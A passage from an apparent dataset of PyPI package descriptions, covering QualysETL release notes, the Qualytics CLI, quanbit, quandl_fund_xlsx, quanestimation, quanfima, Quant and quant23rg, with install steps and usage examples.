details](https://www.qualys.com/docs/release-notes/qualys-cloud-platform-10.23-api-release-notes.pdf) \n0.8.20 | 2023-08-08 23:00 ET | Added Database Injection - Methods to inject schema/data from QualysETL into your downstream databases. Ex. Azure Cosmos DB (PostgreSQL), Amazon RedShift, PostgreSQL Open Source, MySql Open Source, SnowFlake, Microsoft SQL Server. Contact your Qualys TAM to schedule a call with David Gregory if you wish to use this feature. \n0.8.20 | 2023-08-08 23:00 ET | Visualization Use Case - Use QualysETL to build your downstream databases for use with PowerBI, Tableau, Etc. Contact your Qualys TAM to schedule a call with David Gregory if you wish to use this feature. \n0.8.20 | 2023-08-08 23:00 ET | QWEB 10.23 Updates - Delivered additional fields for Host List and Host List Detection. For details see: See [QWEB 10.23 release notification for details](https://www.qualys.com/docs/release-notes/qualys-cloud-platform-10.23-api-release-notes.pdf) \n0.8.20 | 2023-08-08 23:00 ET | Web Application Scanning(WAS) - Updated timing in WAS for long running jobs.\n0.8.20 | 2023-08-08 23:00 ET | Docker Image Testing - Contact your TAM to schedule a call with David Gregory. Encapsulate Python Application into distributable docker image for ease os operation and upgrade.\n0.8.21 | 2023-08-09 11:00 ET | Minor updates to images depicting host list detection schema and web application scanning schema.\n0.8.30 | 2023-10-06 11:00 ET | Added Policy Compliance PCRS -e etl_pcrs to QualysETL.\n0.8.30 | 2023-10-06 11:00 ET | Added fields to CSAM -e etl_asset_inventory: easmTags, hostingCategory1, customAttributes, organizationName\n0.8.40 | 2023-10-07 18:00 ET | PCRS - Added Performance Improvements Added to reduce memory usage and improve multiprocessing.\n0.8.50 | 2023-10-09 18:00 ET | PCRS - Optional Normalized Schema added for PCRS PostureInfo Table, ~50% reduction in space required for PostureInfo.\n0.8.52 | 2023-10-22 18:00 ET | Updated Platform Identification, Added type to Q_WAS_FINDING table in -e etl_was, Default to Normalization for PCRS, and minor doco updates. \n0.8.76 | 2023-11-30 10:00 ET | Minor update to ensure systems have swap space before executing qualysetl. Updated csv distribution format. \n0.8.80 | 2024-01-26 15:00 ET | Minor updates to documentation, addressed edgecase to fix non-utf8 data.\n0.8.85 | 2024-01-29 10:00 ET | Added option to exclude trurisk for edge case where VMDR is not enabled in customer subscription. Ex. Consulting EditionRelease Notes Log0.8.76 Updates to distribution_dir and edge case no swap spaceEdge case: Abort if swap size is zero and ask user to add swap space (recommend 4GB - 8GB swap).Improved edge case exception processing for out of memory on small memory systems.Default csv distribution update:default output format improved for database loader processing:New: {'quoting': csv.QUOTE_ALL, 'delimiter': ',', 'doublequote': True, 'escapechar': None, 'lineterminator': '\\r\\n', 'quotechar': '\"', 'skipinitialspace': False, 'strict': False}Example:psql -c \"\\COPY ${SCHEMA_NAME}.${TABLE_NAME} FROM STDIN WITH (FORMAT csv, DELIMITER ',', QUOTE '\\\"', ENCODING 'UTF8')\"Old:{'quoting': csv.QUOTE_NONE, 'delimiter': '\\t', 'doublequote': False, 'escapechar': '\\\\', 'lineterminator': '\\n', 'quotechar': None, 'skipinitialspace': False, 'strict': False}Note that csv distribution output should only be used if downstream application is developed to handle new fields over time.To Maintain a data contract, use the explicit ordered field names in a sqlite3 select statement to maintain data contract with downstream systems.Created Release Notes Log section at tail end of this document to hold historical release notes.0.8.52 includes the following updates. See Changelog for additional details.Updated PCRS - Default to Normalized Schema Option. Use etld_config_settings.yaml if you do not want to normalize the schema.Updated Platform Identification to recognize additional PODsMinor documentation updates.Updated -e etl_was to include type in q_was_finding table.0.8.50 includes the following updates. See Changelog for additional details.0.8.50:Optional Normalized Schema for PCRS PostureInfo Table, ~50% reduction in space required for PostureInfo.To normalize PCRS PostureInfo add the following option to your etld_config_settings.yaml file.pcrs_postureinfo_schema_normalization_flag: TrueThe schema will change to an optimized schema reducing space required by ~50%.A new table will be created where policyid, controlid, technology id are key to obtaining details of control.Q_PCRS_PostureInfo table has the following fields removed and placed in new table Q_PCRS_PostureInfo_Controls for normalization.policyTitle,controlStatement,rationale,remediation,controlReference,technology,criticalitySee PCRS Schemas below in documenation for more details.Performance Improvements to reduce memory and speed up multiprocessing to download data faster.Added Policy Compliance PCRS to QualysETL including the Policy List, Host Ids associated with each Policy and Posture Info.The 0.8.x >= 0.8.30 series supports Policy Compliance (PCRS), Vulnerability Management (VMDR), GAV/CSAM V2 and Web Application Scanning (WAS) Data.Added easmTags, hostingCategory1, customAttributes, organizationName to etl_asset_inventory (CSAM)https://notifications.qualys.com/api/2023/03/20/qualys-cloud-platform-2-15-csam-api-notification-10.8.21 includes the following updates. See Changelog for additional details.Added QualysETL Automation for injecting schema/data into downstream databases for metrics, analysis and visualization in PowerBI, Tableau, etc. Databases Tested include Azure CosmosDB (PostgreSQL), PostgreSQL Open Source, Amazon Redshift, Snowflake, Mysql, Microsoft SQL Server.Added Docker Beta to run QualysETL in a containerAdded QWEB 10.23 Updates - SeeQWEB 10.23 release notification for detailsTested on Ubuntu 22.04 and Red Hat 9.x as they are the latest supported platforms.The 0.8.x series supports VM, CSAM and WAS Data.Next on the roadmap is Policy Compliance (PCRS) for Nov, 2023.Please see the accompanying videos for additional guidancePart 3 - Host List Detection.Qualys API Best Practices SeriesPart 4 - CyberSecurity Asset Management.Qualys API Best Practices SeriesThe latest schema snapshots are in this document for reference. To obtain the latest schema from QualysETL, please use the SQLite Database output from QualysETL.SeePython Package Index for Qualys ETLfor latest version of qualysetl.SeeRoadmapfor additional details on what's coming next.SeeQuick Startto get started now."} +{"package": "qualytics-cli", "pacakge-description": "Qualytics CLIThis is a CLI tool for working with Qualytics API. With this tool, you can manage your configurations, export checks, import checks, and more. It's built on top of the Typer CLI framework and uses the rich library for fancy terminal prints.RequirementsPython 3.7+Packages:typerosjsonrequestsurllib3rerichInstallationpipinstallqualytics-cliUsageHelpqualytics--helpInitializing the ConfigurationYou can set up your Qualytics URL and token using theinitcommand:qualyticsinit--url\"https://your-qualytics.qualytics.io/\"--token\"YOUR_TOKEN_HERE\"OptionTypeDescriptionDefaultRequired--urlTEXTThe URL to be set. Example:https://your-qualytics.qualytics.io/NoneYes--tokenTEXTThe token to be set.NoneYesQualytics init helpqualyticsinit--helpDisplay ConfigurationTo view the currently saved configuration:qualyticsshow-configExport ChecksYou can export checks to a file using thechecks exportcommand:qualyticschecksexport--datastoreDATASTORE_ID[--containersCONTAINER_IDS][--tagsTAG_NAMES][--outputLOCATION_TO_BE_EXPORTED]By default, it saves the exported checks to./qualytics/data_checks.json. However, you can specify a different output path with the--outputoption.OptionTypeDescriptionDefaultRequired--datastoreINTEGERDatastore IDNoneYes--containersList of INTEGERContainers IDsNoneNo--tagsList of TEXTTag namesNoneNo--outputTEXTOutput file path./qualytics/data_checks.jsonNoExport Check TemplatesEnables exporting check templates to the_export_check_templatestable to an enrichment datastore.qualyticschecksexport-templates--enrichment_datastore_idENRICHMENT_DATASTORE_ID[--check_templatesCHECK_TEMPLATE_IDS]OptionTypeDescriptionDefaultRequired--enrichment_datastore_idINTEGERThe ID of the enrichment datastore where check templates will be exported.Yes--check_templatesTEXTComma-separated list of check template IDs or array-like format. Example: \"1, 2, 3\" or \"[1,2,3]\".NoImport ChecksTo import checks from a file:qualyticschecksimport--datastoreDATASTORE_ID_LIST[--inputLOCATION_FROM_THE_EXPORT]By default, it reads the checks from./qualytics/data_checks.json. You can specify a different input file with the--inputoption.Note: Any errors encountered during the importing of checks will be logged in./qualytics/errors.log.OptionTypeDescriptionDefaultRequired--datastoreTEXTComma-separated list of Datastore IDs or array-like format. Example: 1,2,3,4,5 or \"[1,2,3,4,5]\"NoneYes--inputTEXTInput file pathHOME/.qualytics/data_checks.jsonNoneSchedule Metadata Export:Allows you to schedule exports of metadata from your datastores using a specified crontab expression.qualyticsschedule_appexport-metadata--crontab\"CRONTAB_EXPRESSION\"--datastore\"DATASTORE_ID\"[--containers\"CONTAINER_IDS\"]--options\"EXPORT_OPTIONS\"OptionTypeDescriptionRequired--crontabTEXTCrontab expression inside quotes, specifying when the task should run. Example: \"0 * * * *\"Yes--datastoreTEXTThe datastore IDYes--containersTEXTComma-separated list of container IDs or array-like format. Example: \"1, 2, 3\" or \"[1,2,3]\"No--optionsTEXTComma-separated list of options to export or \"all\". Example: \"anomalies, checks, field-profiles\"Yes"} +{"package": "quamotion", "pacakge-description": "UNKNOWN"} +{"package": "quanario", "pacakge-description": "Quanario_VK - Module for the development of chatbots in the social network VKontakte"} +{"package": "quanbit", "pacakge-description": "QuanbitAboutQuanbitis a pythonic package for simulating quantum computer. It faciliate basic quantum algorithm exploration on a classic computer.PlatformQuanbitis a pure python package supportingWindows,LinuxandMacOS.Example:Quantum TeleportationfromquanbitimportX,Y,Z,BellBasisfromquanbitimportcubit,bell_state,Measureimportnumpyasnp# Alice has an unknown qubit Ctheta,phi,alpha=np.random.rand(3)qubit_C=cubit(theta,phi,alpha)# To teleport the cubit, Alice and Bob need to share a maximally entangled state# Anyone of the four states is sufficient, we choose 1/sqrt(2) (|00> + |11>) herequbit_AB=bell_state(0)# Now the total state is, where @ represent tensor product:total_state=qubit_C@qubit_AB# Project the state of Alice's two qubits as a superpositions of the Bell basistotal_state=BellBasis(total_state,[0,1])# Measuring her two cubits in Bell basisCA,B_state=Measure(total_state,indices[0,1])# Rotate Bob's state based on the measurement result# if CA == (0, 0), no change need to be made# when CA is in state \\Psi+ifCA==(0,1):B_state=X(B_state)# when CA is in state \\Psi-elifCA==(1,0):B_state=Z(X(B_state))# when CA is in state \\Phi-elifCA==(1,1):B_state=Z(B_state)# Now Bob's state is the same as Alice initial qubit_C.LicenseQuanbitis distributed underBSD 3-Clause.DependenceInstallation requirements:numpyTesting requirement:pytestQA requirement:toxInstallationTo run tests:pytestquanbitTo install Quanbit to system:pipinstall.Local build and TestingTo install editable Quanbit locally:pipinstall-e.To run tests:pytesttestsQuality AssuranceTo run QA locally:tox"} +{"package": "quan-chem-kit", "pacakge-description": "Quantum Chemistry Kit"} +{"package": "quandelibc", "pacakge-description": "Collection of c-optimized computation primitive available as python module. When possible, the low level function uses INTEL SIMD primitives."} +{"package": "quandl-fund-xlsx", "pacakge-description": "quandl_fund_xlsxA unofficial CLI tool which uses the Quandl API and the Sharadar Essential Fundamentals\nDatabase to extract financial fundamentals, Sharadar provided ratios as\nwell as calculate additional ratios. Results are\nwritten to an Excel Workbook with a separate worksheet per ticker analysed.Free software: Apache Software License 2.0Documentation:https://quandl_fund_xlsx.readthedocs.io.FeaturesFor a given ticker, fundamental data is obtained using the Quandl API and the\nSharadar Fundamentals database. This data is then used to calculate various\nuseful, financial ratios. The ratios includeProfitability indicatorsFinancial leverage indicatorsFree and Operating Cash flow indicators.Some REIT specific ratios such as FFO are very roughly approximated.\nThese specific ratios are only roughly approximated since certain data, namely\nReal estate sales data for the period does not appear to be available via the\nAPI (It\u2019s often buried in the footnotes of these companies filings).The output excel worksheet for each ticker processed is divided into three main areas:Sharadar statement indicators. This is data obtained from the three main\nfinancial statements; the Income Statement, the Balance Sheet and the Cash Flow\nStatement.Sharadar Metrics and Ratio Indicators. These are quandl provided financial ratios.Calculated Metrics and Ratios. These are calculated by the package from the\nSharadars data provided and tabulated by the statement indicators and the\n\u2018Metrics and Ratio\u2019 indicators.The python Quandl API provides the ability to return data within python pandas\ndataframes. This makes calculating various ratios as simple as dividing two\nvariables by each other.The calculations support the data offered by the free sample\ndatabase (formerly referred to by Sharadar as the SF0 database), and the paid forSF1database. The coverage universe is the same for both the sample data and the\npaid database. The key difference being, support as well as a much richer set\nof so-called Dimensions (timeperiods). For example the sample data is taken from the annual\nfilings of companies, whereas the paid data allows for Trailing Twelve Month\nas well as quarterly data.Note: For quarterly data, many of the ratios using income and cash flow statement values in the\nnumerator will be inaccurate when using quarterly data e.g EBITDA/Intereset\nexpense or Total Debt/ Cash Flow from Operations.The generated Excel workbook with one sheet per ticker.Some bespoke metrics and ratios calculated based on Sharadar fundamentals.Installationpipinstallquandl_fund_xlsxConfigurationYou will need a Quandl API key. This maybe obtained by signing up, for free atQuandl Signup.\nThe key will then be available under \u201cprofile\u201d when logging into Quandl. This\nkey allows for access to sample data for many of the datasets.If you have have a key for the free sample data set the QUANDL_API_SF0_KEY\nenvironment variable to the value of your key.If you have paid for access to the Sharadar\nfundamentals data set, then set the QUANDL_API_SF1_KEY in the environment.exportQUANDL_API_SF0_KEY='YourQuandlAPIKey'orexportQUANDL_API_SF1_KEY='YourQuandlAPIKey'For windows the setx command is used to set environment variables..Usage of the quandl_fund_xlsx CLI commandquandl_fund_xlsx-hquandl_fund_xlsxUsage:quandl_fund_xlsx(-i|-t)[-o][-y][-d][--dimension]quandl_fund_xlsx.py(-h|--help)quandl_fund_xlsx.py--versionOptions:-h--helpShowthisscreen.-i--inputFilecontainingonetickerperline-t--tickerTickersymbol-o--outputOutputfile[default:stocks.xlsx]-y--yearsHowmanyyearsofresults(max7withSF0)[default:5]-d--databaseSharadarFundamentalsdatabasetouse,SFOorSF1[default:SF0]--dimensionSharadardatabasedimension,ARY,MRY,ART,MRT[default:MRY]--versionShowversion.quandl_fund_xlsx-tINTC-ointc-MRY.xlsx{'--database':'SF0','--input':None,'--output':'INTC-MRY.xlsx','--ticker':'INTC','--years':'5'}('Ticker =','INTC')2017-08-2206:08:59,751INFOProcessingthestockINTC2017-08-2206:09:06,012INFOProcessedthestockINTCls-lhexcel_filestotal12K-rw-rw-r--1testtest8.7KAug2206:09intc-MRY.xlsxLocal DevelopmentThis section is only of relevance if you wish to hack on the code yourself,\nperhaps to add new ratios or display other Sharadar provided data values.It\u2019s recommended to setup a virtual environment and perform the installation\nwithin this. Use pip to install the requirements but not the\npackage.pipinstall-rrequirements_dev.txt# Run the CLI by running as a modulepython-mquandl_fund_xlsx.cli-tMSFT# Run the testspytestIf you wish to install the package locally within either a virtualenv or\nglobally this can be done once again using pip.pipinstall-e.# Now the CLI is installed within our environment and should be on the\n# pathquandl_fund_xlsx-tMSFTHow to get help contribute or provide feedbackSee thecontribution submission and feedback guidelines CreditsThis package was created withCookiecutterand theaudreyr/cookiecutter-pypackageproject template.History0.1.1 (2017-08-31)First release on PyPI.0.1.2 (2017-08-31)Change logging to INFO from DEBUG0.1.3 (2017-08-31)Minor tweak to Return the correct version0.1.4 (2017-11-06)Removed the \u2013dimension CLI keyword.\nNow uses Most Recent Year (MRY) for SF0 database\nand Most Recent Trailing 12 Months (MRT) for the SF1 databaseFix to avoid the Pandas future warning about decrementing\ndf.rename_axis and using df.rename0.1.6 (2018-01-26)Now uses the get_table methods from the quandl_api.0.1.7 (2018-05-10)Fix bug where the dataframe returned from quandl qas not being sortedAdded EPS and EPS diluted.0.1.8 ( 2018-05-24)Fix bug where the SF0 subscription data was not being returned.With the discontinuation of the Sharadar Time series API at the end of March\n2018, the codes for the free fundamental subscription SF0 database changed.\nSubscribers to the SF0 data now use the SHARADAR/SF1 code in the get_table\naccesses.0.1.9 ( 2018-06-11)Added back support for the \u2013dimension CLI option.0.1.10 (2018-10-29)Added some new Cash Flow related ratios and corrected the LTDEBT ratiosChanged the default to be the paid SF1 Database as this is the one I\u2019m using\nand testing. Requires a separate free SF0 subscription to test SFO. All of\nthe API calls whether the user has an SFI paid membership or SF0 use the\nSF1 codes.0.2.0 (2018-11-13)After learning that the sample data API now allows _all_ of the same\nindicators as those available using the paid SF! aPI key I was able to\nremove a lot of special case code for the Sample data KEY.\nThe paid KEY allows for many more dimensions to be queried.The CLI now defaults back to using the sample data SF0 API key.Added a number of Cash Flow from Operations based metrics as well as some\nFree Cash Flow based metrics.Added a development test which uses the API and a sample data or SF0 API key\nto extract ratios for AAPL.Added Excess Cash Margin ratio.0.2.1 (2018-11-13)Minor security fix, requests version now >=2.20.0Minor documentation cleanup0.2.2 (2018-11-13)Add support for the MRQ and ARQ dimensions.Correct error in calculating CAGR when the data was given in quarterly increments.Correctly reference the Excel spreadsheet example figures in the README.0.2.3 (2018-12-29)Check for the presence of the QUANDL_API_SF0_KEY or the QUANDL_API_SF1_KEY\nenvironment variable depending on which database the user is requesting to use.0.3.0 (2019-09-12)Refactored by using and manipulating the pandas dataframe as it\u2019a returned from\nquandl/Sharadar. The dates are rows and the columns are the \u201cobservations\u201d\nie the revenue, income etc. The dataframe is transposed prior to writing to\nexcel so that the data is in the typically viewed format of dates as columns\nand the observations as rows.0.3.1 (2019-11-11)Added some metrics favored by Kenneth J Marshall, author of\n\u201cGood Stocks Cheap: Value investing with confidence for a lifetime of\nStock Market Outperformance\u201d0.3.2 (2020-03-31)Added the working capital value from the balance sheet\nNote: For finance companies and REITS this is not provided by the API.0.4.0 (2020-04-21)Added a summary sheet as the first sheet of a workbook.\nThis is conditionally formatted to highlight the best and worst\nvalues for each of the summarized metrics of each ticker in the\nworkbook.\nThe summary table is an excel table and thus each column can be sorted\nto put best on top or worst on top.0.4.1 (2021-02-03)Added roic and roce to the summary sheet."} +{"package": "quandlpy", "pacakge-description": "UNKNOWN"} +{"package": "quanestimation", "pacakge-description": "QuanEstimationDocumentationQuanEstimation is a Python-Julia based open-source toolkit for quantum parameter estimation, which consist in the calculation of the quantum metrological tools and quantum resources, and the optimizations with respect to the probe states, the controls or the measurements, as well as comprehensive optimizations in quantum metrology. Futhermore, QuanEstimation can generate not only optimal quantum parameter estimation schemes, but also adaptive measurement schemes.DocumentationThe documentation of QuanEstimation can be foundhere.InstallationRun the command in the terminal to install QuanEstimation:pip install quanestimationCitationIf you use QuanEstimation in your research, please cite the following paper:[1] M. Zhang, H.-M. Yu, H. Yuan, X. Wang, R. Demkowicz-Dobrza\u8245ski, and J. Liu,\nQuanEstimation: An open-source toolkit for quantum parameter estimation,arXiv:2205.15588.=======\nHistory0.1.0 (2022-06-04)\n0.1.3 (2022-06-08)\n0.1.4 (2022-06-19)\n0.1.5 (2022-07-07)\n0.2.0 (2022-09-01)First release on PyPI."} +{"package": "quanfima", "pacakge-description": "Quanfima(quantitativeanalysis offibrousmaterials)\nis a collection of useful functions for morphological analysis and visualization\nof 2D/3D data from various areas of material science. The aim is to simplify\nthe analysis process by providing functionality for frequently required tasks\nin the same place.More examples of usage you can find in the documentation.Analysis of fibrous structures by tensor-based method in 2D / 3D datasets.Estimation of structure diameters in 2D / 3D by a ray-casting method.Counting of particles in 2D / 3D datasets and providing a detailed report in\npandas.DataFrame format.Calculation of porosity measure for each material in 2D / 3D datasets.Visualization in 2D / 3D using matplotlib, visvis packages.InstallationThe easiest way to install the latest version is by using pip:$ pip install quanfimaYou may also use Git to clone the repository and install it manually:$ git clone https://github.com/rshkarin/quanfima.git\n$ cd quanfima\n$ python setup.py installUsageOpen a grayscale image, perform segmentation, estimate porosity, analyze fiber\norientation and diameters, and plot the results.importnumpyasnpfromskimageimportio,filtersfromquanfimaimportmorphologyasmrphfromquanfimaimportvisualizationasvisfromquanfimaimportutilsimg=io.imread('../data/polymer_slice.tif')th_val=filters.threshold_otsu(img)img_seg=(img>th_val).astype(np.uint8)# estimate porositypr=mrph.calc_porosity(img_seg)fork,vinpr.items():print'Porosity ({}):{}'.format(k,v)# prepare data and analyze fibersdata,skeleton,skeleton_thick=utils.prepare_data(img_seg)cskel,fskel,omap,dmap,ovals,dvals=\\mrph.estimate_fiber_properties(data,skeleton)# plot resultsvis.plot_orientation_map(omap,fskel,min_label=u'0\u00b0',max_label=u'180\u00b0',figsize=(10,10),name='2d_polymer',output_dir='/path/to/output/dir')vis.plot_diameter_map(dmap,cskel,figsize=(10,10),cmap='gist_rainbow',name='2d_polymer',output_dir='/path/to/output/dir')>>Porosity(Material1):0.845488888889"} +{"package": "quangdvn-pdf", "pacakge-description": "## THIS IS THE PACKAGE"} +{"package": "quangdv-pybloqs", "pacakge-description": "Data Visualization and Report Building fork from PyBlogs"} +{"package": "quanmodule", "pacakge-description": "It\u2019s my first Python package bitch"} +{"package": "quanmsms", "pacakge-description": "quanmsms_Python[\u4e2d\u6587] |English\u4ecb\u7ecdpython\u7248\u672c\u8981\u6c42:py3.x\n\u5b89\u88c5\uff1apip install quanmsms\n\u6700\u8fd1\u66f4\u65b0:2023/12/24\u4f7f\u7528# \u6211\u4eec\u5728sdk\u4e2d\u63d0\u4f9b\u4e86example.py(\u6700\u5c0f\u793a\u4f8b\u6587\u4ef6)# \u4f46\u60a8\u4ecd\u53ef\u53c2\u8003\u672c\u6587\u6863# \u8bf7\u786e\u8ba4\u5728\u5f53\u524d\u73af\u5883\u5b89\u88c5\u4e86\u6700\u65b0\u7248sdk\uff1apip install quanmsmsfromquanmsmsimportsdk# openID\u3001Apikey\u4ee5\u53ca\u6a21\u677f\u90fd\u53ef\u4ee5\u5728 https://dev.quanmwl.com/ability_sms \u67e5\u770b\u5230# \u5176\u4e2d\uff0c\u6a21\u677f\u53ef\u4ee5\u5728\u6d4b\u8bd5\u63a5\u53e3\u6210\u529f\u540e\u7533\u8bf7\u81ea\u5b9a\u4e49\u6a21\u677fsms=sdk.SDK('2',# OpenID'wd4wa8d4a98w94d89wefwsef4ae9f7ad59ae46s7te49g7t4g9y65h'# Apikey)# \u624b\u673a\u53f7 \u6a21\u677fid \u6a21\u677f\u53c2\u6570sendOK,info,apiStatus=sms.send('19954761564',0,{'code':12344})print(sendOK)# \u662f\u5426\u6210\u529f(\u5e03\u5c14\u503c)print(apiStatus)# api\u72b6\u6001\u7801print(info)# \u63cf\u8ff0\u4fe1\u606f"} +{"package": "quanp", "pacakge-description": "Quanp \u2013 Quantitative Analysis in PythonQuanp is a scalable toolkit for analyzing cross-sectional and longitudinal/time-series\nquantitative data. It was first inspired byscanpyand\njointly built withanndata. It includes\npreprocessing, visualization, clustering, features selection/importance.Read thedocumentation. If you\u2019d like to contribute by opening an issue or creating a pull request,\nplease take a look at ourcontributing guide.\nIf Quanp is useful for your research, consider being a contributor."} +{"package": "quanpy", "pacakge-description": "UNKNOWN"} +{"package": "quant", "pacakge-description": "Welcome to QuantQuant is an enterprise software application for quantitative analysis.\nQuant combinesSciPyandDomainModel.Quant contains a domain model which has exchanges, symbols, markets,\nprice histories, price processes, images, books, contracts of different\ntypes, pricers, pricing preferences, and reports.Quant has a domain-specific language (Quant DSL) for expressing and\nevaluating contracts in a generic manner.Quant has a Web user interface, and an API for machine clients. Quant has a\nflexible role-based access controller. There is a Web admin interface, and\nalso command line programs to support site setup and administration.Quant can be extended by adding new price processes, custom contract types,\nand alternative pricers. Quant is currently distributed with a Black Scholes\nprice process. There are contract types for American, Binary, European,\nFutures, and for expressing contracts with Quant DSL. There are pricers\nimplementing the Monte Carlo, binomial tree, and Black Scholes methods. There\nis a pricer for contract types based on the Quant DSL which involves the\nLongstaff Schwartz least-squares Monte Carlo (LSM) method.Other features we are planning to implement include:Market prices pulled from exchange APIs;Integration with common spreadsheet applications;State machine enhancements to DSL;Different price processes (e.g local volatility).If you would like to suggest a feature, please get in touch!WebsitePlease visit theQuant project website.Install GuideWelcome to the Quant Install Guide.It is very easy to create new Quant services. Either do it all manually or\nuse the Quant installer. Afterwards, simply configure and restart Apache.The Quant installer will deploy Quant into a new virtual Python environment.\nNew services are set up with an SQLite database. Installer options exist\nfor using other database management systems, and it is possible to migrate\nbetween different database management system after the service is created.Operating System DependenciesBefore installation, make sure required system packages are installed:$ sudo aptitude install python python-numpy python-scipy sqlite3If you are using Python 2.5, you will also need a few other packages:$ sudo aptitude install build-essential python-dev libsqlite3-devCheck your Python can load scipy with (returns silently if available):$ python -c \"import numpy\"\n$ python -c \"import scipy\"Please note, if you will install Quant into an isolated virtual Python\nenvironment (e.g. with virtualenv), you will want to create library links\nto the Python packages for SciPy (and NumPy) before installing Quant.Manual Code InstallInstall the Quant Python package (and dependencies) either by running:$ pip install quantOr by downloading the Quant tarball, unpacking and running:$ python setup.py installAfter installation, please read the following help pages for more information:$ quant-makeconfig --help\n$ quant-admin help setupManual Site SetupDecide a filesystem path for the new site:$ mkdir PATHCreate the new site configuration file:$ quant-makeconfig --master-dir=PATH PATH/quant.confSet up the new site with the new configuration:$ quant-admin setup --config=PATH/quant.confPlease note, if you installed Quant into an isolated virtual Python\nenvironment, you will want to use the \u2013virtualenv-bin-dir option of\nquant-makeconfig.The configuration file defines the filesystem path to the newly generated\nApache configuration file. You will need to need to include this file in the\nmain Apache configuration.Automated Install and DeployYou can create a Quant service in one step with the Quant installer.The installer will build a virtual Python environment, and install\nthe Quant software. The installer will then set up a new site with an SQLite\ndatabase, and it will create an Apache config file to be included in the main\nApache configuration (see below).Download the Quant installer (and make it executable):$ curl -O http://appropriatesoftware.net/provide/docs/quant-virtualenv\n$ chmod +x quant-virtualenvRun the Quant installer. Note that the PATH folder should never be\nunder DocumentRoot of the Apache installation or any other directory\nexposed via Apache web server:$ ./quant-virtualenv PATHPlease note, the path argument is required (and can be relative or absolute).After the installer has completed, continue by configuring Apache with a new\nVirtualHost, check file ownership and permissions, and restart.The installer will diplay the filesystem path to the newly generated Apache\nconfiguration file. You will need to need to include this file in the main\nApache configuration.Apache Configuration StepsMake sure the required system packages are installed:$ sudo aptitude install apache2 libapache2-mod-wsgiAlso, make sure Apache mod_wsgi is enabled:$ sudo a2enmod wsgiPick a domain name for your site. Create a new virtual host which includes\nthe Quant Apache configuration (path mentioned by the installer).Print the path to the Quant Apache configuration file with:$ quant-admin www path --config PATH/etc/quant.confA new Apache virtual host could simply look like this:\n ServerName YOUR-QUANT-SITE\n Include PATH/var/httpd-autogenerated.conf\n WSGIDaemonProcess quant threads=25 maximum-requests=1000\nPlease note, the path to the auto-generated file must be an absolute path (not\na relative path).If necessary, configure your DNS for YOUR-QUANT-SITE.File OwnershipChange ownership of Quant files to Apache (or to the user which the WSGI\ndaemon process runs as):$ chown -R {www-user}:{www-user} PATHRestart ApacheOnce everything is configured, try to restart Apache:$ sudo /etc/init.d/apache2 restartYour virtual host will show a page saying \u2018Welcome to Quant\u2019.Login with username \u2018admin\u2019 and password \u2018pass\u2019.ContactIf you have any difficulties or questions about Quant, please email:quant-support@appropriatesoftware.netPlease note, at the moment, Quant is developed and tested on Ubuntu 10.10\n(64 bit) with Python 2.7. Quant should work on any recent Linux distribution.AboutQuant is a project of the Appropriate Software Foundation. Please refer to theQuant websitefor more information."} +{"package": "quant1x", "pacakge-description": "No description available on PyPI."} +{"package": "quant1x-base", "pacakge-description": "# base#### \u4ecb\u7ecd\nquant1x\u7cfb\u7edfpython\u57fa\u7840\u5e93"} +{"package": "quant1x-formula", "pacakge-description": "No description available on PyPI."} +{"package": "quant1x-qmt", "pacakge-description": "No description available on PyPI."} +{"package": "quant1x-trader", "pacakge-description": "# trader#### \u4ecb\u7ecd\npython\u5b9e\u73b0\u7684\u81ea\u52a8\u5316\u4ea4\u6613\u5458"} +{"package": "quant1x-xtquant", "pacakge-description": "# XtQuant#### \u4ecb\u7ecd\nXtQuant Lib(python for windows)#### \u8f6f\u4ef6\u67b6\u6784\n\u8fc5\u6295QMT\u5b98\u7f51\u4e0b\u8f7d\u5730\u5740: [http://docs.thinktrader.net/pages/633b48/](http://docs.thinktrader.net/pages/633b48/)"} +{"package": "quant23rg", "pacakge-description": "Welcome on the quant23rg packagequant23rg is python package for quantitative analysisInstall it by typing this command in your command promptpip install quant23rg==0.0.5The package is still in progressAuthor : Adrien Calas - Le23RayGorbella (Freelancer)Click here to contact by mail, Location : Paris and Nice, FranceLinkedinAvailable : european options pricing, implied volatilities, geometrical brownian motion for assets and portfolios, value at risk & conditional value at risk (work in progress for portfolio)European options pricingimportpandasaspdfromquant23rg.pricingCallEuropBSimportPricingCallEuropBSfromquant23rg.pricingPutEuropBSimportPricingPutEuropBSspy_opt=pd.read_csv(\"spy-options.csv\",).dropna()spy_opt.columns=[col+\"_call\"if\".1\"notincolandcol!=\"Strike\"elsecolforcolinspy_opt.columns]spy_opt.columns=[col.replace(\".1\",\"_put\")forcolinspy_opt.columns]spy_opt[\"IV_call\"]=spy_opt[\"IV_call\"].apply(lambdax:float(x.replace(\"%\",\"\"))/100)spy_opt[\"IV_put\"]=spy_opt[\"IV_put\"].apply(lambdax:float(x.replace(\"%\",\"\"))/100)spy_opt[\"Last_call\"]=spy_opt[\"Last_call\"].apply(lambdax:float(x))spy_opt[\"Last_put\"]=spy_opt[\"Last_put\"].apply(lambdax:float(x))call_example=spy_opt.sort_values(\"Volume_call\",ascending=False).iloc[0]# Last_call 27.9# Bid_call 27.85# Ask_call 28.18# Change_call 27.9# Volume_call 962# Open Int_call 2,741# IV_call 0.1815# Last Trade_call 05/26/23# Strike 410.0# Last_put 12.45# Bid_put 12.24# Ask_put 12.4# Change_put 12.45# Volume_put 1,234# Open Int_put 20,292# IV_put 0.1831# Last Trade_put 05/26/23# Name: 47, dtype: objects0=420.02# 29 may 2023dt=146/252# in years, expiration date : 20 october 2023call_pricing=PricingCallEuropBS(s0=s0,strike=call_example.Strike,dt=dt,interest_rate=0.05*dt,# fed rate multiplied by our period of timevolatility=0.1326,)call_pricing.payoff_sigma_fixed()put_pricing=PricingPutEuropBS(s0=s0,strike=call_example.Strike,dt=dt,interest_rate=0.05*dt,# fed rate multiplied by our period of timevolatility=0.1326,)put_pricing.payoff_sigma_fixed()Implied volatilities### See volatility smile (Strike -> IV(Strike)) ###fromquant23rg.implied_volatilityimportImpliedVolatilityivs=ImpliedVolatility(s0=s0,strike=call_example.Strike,dt=dt,interest_rate=0.05*dt,# fed rate multiplied by our period of timevolatility=0.1326,)ivs.show_implied_vol_and_compare(marketPrices_call=spy_opt[\"Last_call\"].tolist(),marketPrices_put=spy_opt[\"Last_put\"].tolist(),strikes=spy_opt.Strike.tolist(),marketVols=spy_opt.IV_call.tolist(),)Geometrical Brownian Motion for assets and 